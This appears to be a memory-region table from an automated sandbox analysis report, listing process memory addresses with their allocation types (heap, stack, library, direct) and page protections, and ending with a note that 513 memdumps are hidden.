7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
21B9A930000
|
heap
|
page read and write
|
||
|
244883E0000
|
heap
|
page read and write
|
||
|
5308000
|
trusted library allocation
|
page read and write
|
||
|
21B989F0000
|
heap
|
page read and write
|
||
|
21B989E2000
|
heap
|
page read and write
|
||
|
21B9A9C1000
|
heap
|
page read and write
|
||
|
752E000
|
stack
|
page read and write
|
||
|
24488440000
|
heap
|
page read and write
|
||
|
24489FC0000
|
heap
|
page read and write
|
||
|
21B988E0000
|
heap
|
page read and write
|
||
|
244A26B7000
|
heap
|
page read and write
|
||
|
2448A49E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
88AC000
|
heap
|
page read and write
|
||
|
56DD57D000
|
stack
|
page read and write
|
||
|
21B9AA41000
|
heap
|
page read and write
|
||
|
78B8000
|
trusted library allocation
|
page read and write
|
||
|
21B98BA7000
|
heap
|
page read and write
|
||
|
74EE000
|
stack
|
page read and write
|
||
|
8A20000
|
trusted library allocation
|
page read and write
|
||
|
2448A7AA000
|
trusted library allocation
|
page read and write
|
||
|
21B9A9C0000
|
heap
|
page read and write
|
||
|
21B9AA32000
|
heap
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
21B9AB95000
|
heap
|
page read and write
|
||
|
4C11000
|
trusted library allocation
|
page read and write
|
||
|
21B98BA8000
|
heap
|
page read and write
|
||
|
21B9A91D000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
78AE000
|
stack
|
page read and write
|
||
|
31FA000
|
heap
|
page read and write
|
||
|
1DBE7EB0000
|
heap
|
page read and write
|
||
|
21B9A872000
|
heap
|
page read and write
|
||
|
21B9A903000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
21B98BA9000
|
heap
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
2448A77A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
21B9AAD6000
|
heap
|
page read and write
|
||
|
24489D12000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
244A23E0000
|
heap
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
8B10000
|
direct allocation
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page read and write
|
||
|
4A88000
|
trusted library allocation
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
21B9A85A000
|
heap
|
page read and write
|
||
|
24489F50000
|
heap
|
page execute and read and write
|
||
|
9AE70FD000
|
stack
|
page read and write
|
||
|
24488420000
|
trusted library allocation
|
page read and write
|
||
|
21B9A928000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA9E000
|
heap
|
page read and write
|
||
|
2448BEBD000
|
trusted library allocation
|
page read and write
|
||
|
21B989E0000
|
heap
|
page read and write
|
||
|
21B9AA32000
|
heap
|
page read and write
|
||
|
21B9A9C0000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
244A24A6000
|
heap
|
page read and write
|
||
|
21B988C0000
|
heap
|
page read and write
|
||
|
2BE7000
|
stack
|
page read and write
|
||
|
31D4000
|
trusted library allocation
|
page read and write
|
||
|
21B9AAAE000
|
heap
|
page read and write
|
||
|
21B9AA65000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
6FD0000
|
heap
|
page execute and read and write
|
||
|
21B9AA55000
|
heap
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
4B30000
|
trusted library allocation
|
page read and write
|
||
|
24489F43000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
21B9AABD000
|
heap
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
21B9AB53000
|
heap
|
page read and write
|
||
|
21B9A940000
|
heap
|
page read and write
|
||
|
24488270000
|
heap
|
page read and write
|
||
|
21B989A0000
|
heap
|
page read and write
|
||
|
300E000
|
stack
|
page read and write
|
||
|
31C0000
|
trusted library allocation
|
page read and write
|
||
|
24499FE0000
|
trusted library allocation
|
page read and write
|
||
|
2448B1AA000
|
trusted library allocation
|
page read and write
|
||
|
21B9A906000
|
heap
|
page read and write
|
||
|
5C7E000
|
trusted library allocation
|
page read and write
|
||
|
21B98BA0000
|
heap
|
page read and write
|
||
|
2448BF79000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA39000
|
heap
|
page read and write
|
||
|
244A25E0000
|
heap
|
page read and write
|
||
|
21B9A951000
|
heap
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page read and write
|
||
|
21B9AAA9000
|
heap
|
page read and write
|
||
|
771E000
|
heap
|
page read and write
|
||
|
21B989B8000
|
heap
|
page read and write
|
||
|
855E000
|
stack
|
page read and write
|
||
|
21B989AF000
|
heap
|
page read and write
|
||
|
21B989EE000
|
heap
|
page read and write
|
||
|
9AE6AFE000
|
stack
|
page read and write
|
||
|
21B9AB50000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
2448BE9F000
|
trusted library allocation
|
page read and write
|
||
|
7DF483CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
49B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B9A87D000
|
heap
|
page read and write
|
||
|
21B9A902000
|
heap
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
77D0000
|
heap
|
page execute and read and write
|
||
|
21B9A93A000
|
heap
|
page read and write
|
||
|
24488430000
|
heap
|
page readonly
|
||
|
21B9ABA7000
|
heap
|
page read and write
|
||
|
7701000
|
heap
|
page read and write
|
||
|
21B98986000
|
heap
|
page read and write
|
||
|
21B9A86D000
|
heap
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
21B9AAB1000
|
heap
|
page read and write
|
||
|
21B9A87A000
|
heap
|
page read and write
|
||
|
244883F0000
|
trusted library section
|
page read and write
|
||
|
21B9AA91000
|
heap
|
page read and write
|
||
|
21B9AA75000
|
heap
|
page read and write
|
||
|
21B9A853000
|
heap
|
page read and write
|
||
|
310F000
|
heap
|
page read and write
|
||
|
21B9A951000
|
heap
|
page read and write
|
||
|
24488492000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
21B98BAD000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
trusted library allocation
|
page read and write
|
||
|
3178000
|
heap
|
page read and write
|
||
|
244A2622000
|
heap
|
page read and write
|
||
|
21B98972000
|
heap
|
page read and write
|
||
|
21B989D4000
|
heap
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
21B9AB73000
|
heap
|
page read and write
|
||
|
21B9A91D000
|
heap
|
page read and write
|
||
|
21B98940000
|
heap
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
21B9A93A000
|
heap
|
page read and write
|
||
|
8AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
244A2669000
|
heap
|
page read and write
|
||
|
8889000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
21B9AB90000
|
heap
|
page read and write
|
||
|
21B9A91D000
|
heap
|
page read and write
|
||
|
B138000
|
direct allocation
|
page execute and read and write
|
||
|
21B9A875000
|
heap
|
page read and write
|
||
|
2448A404000
|
trusted library allocation
|
page read and write
|
||
|
21B988B0000
|
heap
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
24488370000
|
heap
|
page read and write
|
||
|
24489DD5000
|
heap
|
page read and write
|
||
|
21B989AC000
|
heap
|
page read and write
|
||
|
24489CE0000
|
trusted library allocation
|
page read and write
|
||
|
84D0000
|
heap
|
page read and write
|
||
|
21B9AB60000
|
heap
|
page read and write
|
||
|
21B9AB51000
|
heap
|
page read and write
|
||
|
339F000
|
unkown
|
page read and write
|
||
|
31E9000
|
trusted library allocation
|
page read and write
|
||
|
21B9A857000
|
heap
|
page read and write
|
||
|
21B98995000
|
heap
|
page read and write
|
||
|
21B9AA72000
|
heap
|
page read and write
|
||
|
D7C6EFD000
|
stack
|
page read and write
|
||
|
5EC1000
|
trusted library allocation
|
page read and write
|
||
|
21B9AD20000
|
heap
|
page read and write
|
||
|
21B9AA96000
|
heap
|
page read and write
|
||
|
244A23D7000
|
heap
|
page execute and read and write
|
||
|
49A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B9AADA000
|
heap
|
page read and write
|
||
|
782E000
|
stack
|
page read and write
|
||
|
21B9AA49000
|
heap
|
page read and write
|
||
|
2448A055000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
21B9A9C0000
|
heap
|
page read and write
|
||
|
21B98993000
|
heap
|
page read and write
|
||
|
24488400000
|
trusted library allocation
|
page read and write
|
||
|
799D000
|
stack
|
page read and write
|
||
|
2448A609000
|
trusted library allocation
|
page read and write
|
||
|
2FCE000
|
unkown
|
page read and write
|
||
|
21B9AC50000
|
heap
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA85000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
21B989EB000
|
heap
|
page read and write
|
||
|
244A26C0000
|
heap
|
page read and write
|
||
|
21B98BA8000
|
heap
|
page read and write
|
||
|
9AE72FE000
|
stack
|
page read and write
|
||
|
21B9A981000
|
heap
|
page read and write
|
||
|
244883D0000
|
trusted library section
|
page read and write
|
||
|
56DE68A000
|
stack
|
page read and write
|
||
|
7330000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
244A25EC000
|
heap
|
page read and write
|
||
|
21B9A944000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
21B989B2000
|
heap
|
page read and write
|
||
|
2448BD87000
|
trusted library allocation
|
page read and write
|
||
|
24489D10000
|
trusted library allocation
|
page read and write
|
||
|
21B9AC51000
|
heap
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
244884CE000
|
heap
|
page read and write
|
||
|
4B1E000
|
stack
|
page read and write
|
||
|
21B9AA6A000
|
heap
|
page read and write
|
||
|
49AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B9A90D000
|
heap
|
page read and write
|
||
|
86DC000
|
stack
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
9200000
|
direct allocation
|
page execute and read and write
|
||
|
21B9A965000
|
heap
|
page read and write
|
||
|
244A2684000
|
heap
|
page read and write
|
||
|
21B9AB54000
|
heap
|
page read and write
|
||
|
49B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
851E000
|
stack
|
page read and write
|
||
|
21B9A919000
|
heap
|
page read and write
|
||
|
21B9AAA1000
|
heap
|
page read and write
|
||
|
4D68000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA36000
|
heap
|
page read and write
|
||
|
21B9A854000
|
heap
|
page read and write
|
||
|
21B989AE000
|
heap
|
page read and write
|
||
|
21B9A8FE000
|
heap
|
page read and write
|
||
|
21B9896A000
|
heap
|
page read and write
|
||
|
6FD5000
|
heap
|
page execute and read and write
|
||
|
21B989A8000
|
heap
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
21B9A410000
|
heap
|
page read and write
|
||
|
21B9A980000
|
heap
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
21B9A923000
|
heap
|
page read and write
|
||
|
56DE58E000
|
stack
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA82000
|
heap
|
page read and write
|
||
|
21B989B1000
|
heap
|
page read and write
|
||
|
21B9AA62000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
244884D0000
|
heap
|
page read and write
|
||
|
2448848C000
|
heap
|
page read and write
|
||
|
21B989F0000
|
heap
|
page read and write
|
||
|
8B00000
|
trusted library allocation
|
page read and write
|
||
|
21B9898E000
|
heap
|
page read and write
|
||
|
5C11000
|
trusted library allocation
|
page read and write
|
||
|
8457000
|
stack
|
page read and write
|
||
|
56DD0E3000
|
stack
|
page read and write
|
||
|
2448A791000
|
trusted library allocation
|
page read and write
|
||
|
49D0000
|
trusted library allocation
|
page read and write
|
||
|
9AE6BFD000
|
stack
|
page read and write
|
||
|
30C4000
|
heap
|
page read and write
|
||
|
21B9A8F9000
|
heap
|
page read and write
|
||
|
21B9A981000
|
heap
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
21B989C2000
|
heap
|
page read and write
|
||
|
21B9898F000
|
heap
|
page read and write
|
||
|
21B989DC000
|
heap
|
page read and write
|
||
|
21B9A944000
|
heap
|
page read and write
|
||
|
21B98BAD000
|
heap
|
page read and write
|
||
|
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
|
21B9A888000
|
heap
|
page read and write
|
||
|
21B9A851000
|
heap
|
page read and write
|
||
|
21B989B1000
|
heap
|
page read and write
|
||
|
21B9AB93000
|
heap
|
page read and write
|
||
|
2448B611000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA5A000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
21B9A888000
|
heap
|
page read and write
|
||
|
8580000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
21B989D5000
|
heap
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B9A8FB000
|
heap
|
page read and write
|
||
|
21B98982000
|
heap
|
page read and write
|
||
|
9AE73FB000
|
stack
|
page read and write
|
||
|
2449A2CF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B9AAC5000
|
heap
|
page read and write
|
||
|
21B9A90C000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
21B9A905000
|
heap
|
page read and write
|
||
|
56DDA3E000
|
stack
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
2448BD8D000
|
trusted library allocation
|
page read and write
|
||
|
21B989F1000
|
heap
|
page read and write
|
||
|
2E3D000
|
stack
|
page read and write
|
||
|
21B9A8F9000
|
heap
|
page read and write
|
||
|
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7B80000
|
heap
|
page read and write
|
||
|
8A50000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
21B9A938000
|
heap
|
page read and write
|
||
|
24488350000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
21B9A8F9000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
21B989B1000
|
heap
|
page read and write
|
||
|
21B9A914000
|
heap
|
page read and write
|
||
|
3080000
|
trusted library section
|
page read and write
|
||
|
21B9A917000
|
heap
|
page read and write
|
||
|
21B989F0000
|
heap
|
page read and write
|
||
|
2448BE1A000
|
trusted library allocation
|
page read and write
|
||
|
8857000
|
heap
|
page read and write
|
||
|
56DDABE000
|
stack
|
page read and write
|
||
|
21B9A944000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
21B989F0000
|
heap
|
page read and write
|
||
|
21B9A904000
|
heap
|
page read and write
|
||
|
21B989D6000
|
heap
|
page read and write
|
||
|
244A2482000
|
heap
|
page read and write
|
||
|
9338000
|
direct allocation
|
page execute and read and write
|
||
|
21B9A974000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
786F000
|
stack
|
page read and write
|
||
|
21B9A91E000
|
heap
|
page read and write
|
||
|
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7B90000
|
heap
|
page read and write
|
||
|
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
|
21B989A4000
|
heap
|
page read and write
|
||
|
21B9AA3E000
|
heap
|
page read and write
|
||
|
8A30000
|
trusted library allocation
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
771C000
|
heap
|
page read and write
|
||
|
244A2452000
|
heap
|
page read and write
|
||
|
244A23D0000
|
heap
|
page execute and read and write
|
||
|
8843000
|
heap
|
page read and write
|
||
|
2F3E000
|
stack
|
page read and write
|
||
|
21B98998000
|
heap
|
page read and write
|
||
|
2BAC000
|
stack
|
page read and write
|
||
|
21B9A955000
|
heap
|
page read and write
|
||
|
21B9AA32000
|
heap
|
page read and write
|
||
|
21B9A850000
|
heap
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
49B2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
9AE671A000
|
stack
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
21B9AA6D000
|
heap
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
79E0000
|
heap
|
page read and write
|
||
|
9AE6EFF000
|
stack
|
page read and write
|
||
|
4ADC000
|
stack
|
page read and write
|
||
|
4B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A40000
|
trusted library allocation
|
page read and write
|
||
|
A738000
|
direct allocation
|
page execute and read and write
|
||
|
21B989B5000
|
heap
|
page read and write
|
||
|
56DDB3F000
|
stack
|
page read and write
|
||
|
2449A2C0000
|
trusted library allocation
|
page read and write
|
||
|
21B9A85E000
|
heap
|
page read and write
|
||
|
24489F60000
|
heap
|
page execute and read and write
|
||
|
1DBE7D90000
|
heap
|
page read and write
|
||
|
21B989D5000
|
heap
|
page read and write
|
||
|
21B9AA31000
|
heap
|
page read and write
|
||
|
76C3000
|
heap
|
page read and write
|
||
|
21B9AABA000
|
heap
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
21B98BA5000
|
heap
|
page read and write
|
||
|
8460000
|
trusted library allocation
|
page execute and read and write
|
||
|
31AC000
|
heap
|
page read and write
|
||
|
21B9A91F000
|
heap
|
page read and write
|
||
|
21B9A980000
|
heap
|
page read and write
|
||
|
244A24E0000
|
heap
|
page read and write
|
||
|
21B9AA8E000
|
heap
|
page read and write
|
||
|
4C6B000
|
trusted library allocation
|
page read and write
|
||
|
21B98971000
|
heap
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B989E0000
|
heap
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B9AA32000
|
heap
|
page read and write
|
||
|
21B9A8FB000
|
heap
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B9A950000
|
heap
|
page read and write
|
||
|
349F000
|
stack
|
page read and write
|
||
|
21B9A94E000
|
heap
|
page read and write
|
||
|
7650000
|
heap
|
page read and write
|
||
|
4A60000
|
heap
|
page readonly
|
||
|
1DBE7BCB000
|
heap
|
page read and write
|
||
|
84B0000
|
heap
|
page read and write
|
||
|
21B9A933000
|
heap
|
page read and write
|
||
|
21B9AA31000
|
heap
|
page read and write
|
||
|
4A70000
|
heap
|
page read and write
|
||
|
889F000
|
heap
|
page read and write
|
||
|
244A2471000
|
heap
|
page read and write
|
||
|
7659000
|
heap
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
244A26B2000
|
heap
|
page read and write
|
||
|
244A2674000
|
heap
|
page read and write
|
||
|
7797000
|
trusted library allocation
|
page read and write
|
||
|
21B989BC000
|
heap
|
page read and write
|
||
|
24489D50000
|
trusted library allocation
|
page read and write
|
||
|
4A78000
|
heap
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
2F29000
|
heap
|
page read and write
|
||
|
24499FD1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
8820000
|
heap
|
page read and write
|
||
|
2448A1F7000
|
trusted library allocation
|
page read and write
|
||
|
21B98BAE000
|
heap
|
page read and write
|
||
|
21B9A93B000
|
heap
|
page read and write
|
||
|
21B9AB70000
|
heap
|
page read and write
|
||
|
21B9896B000
|
heap
|
page read and write
|
||
|
21B9AA8A000
|
heap
|
page read and write
|
||
|
244A2501000
|
heap
|
page read and write
|
||
|
21B9A944000
|
heap
|
page read and write
|
||
|
24488486000
|
heap
|
page read and write
|
||
|
7ACB000
|
stack
|
page read and write
|
||
|
21B989C2000
|
heap
|
page read and write
|
||
|
31D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
244A2692000
|
heap
|
page read and write
|
||
|
21B989ED000
|
heap
|
page read and write
|
||
|
21B98BAE000
|
heap
|
page read and write
|
||
|
9AE6DFE000
|
stack
|
page read and write
|
||
|
21B9A943000
|
heap
|
page read and write
|
||
|
21B9A882000
|
heap
|
page read and write
|
||
|
21B9A90E000
|
heap
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
31DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
|
871C000
|
stack
|
page read and write
|
||
|
1DBE7EA0000
|
heap
|
page read and write
|
||
|
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DBE7EA5000
|
heap
|
page read and write
|
There are 513 hidden memdumps, click here to show them.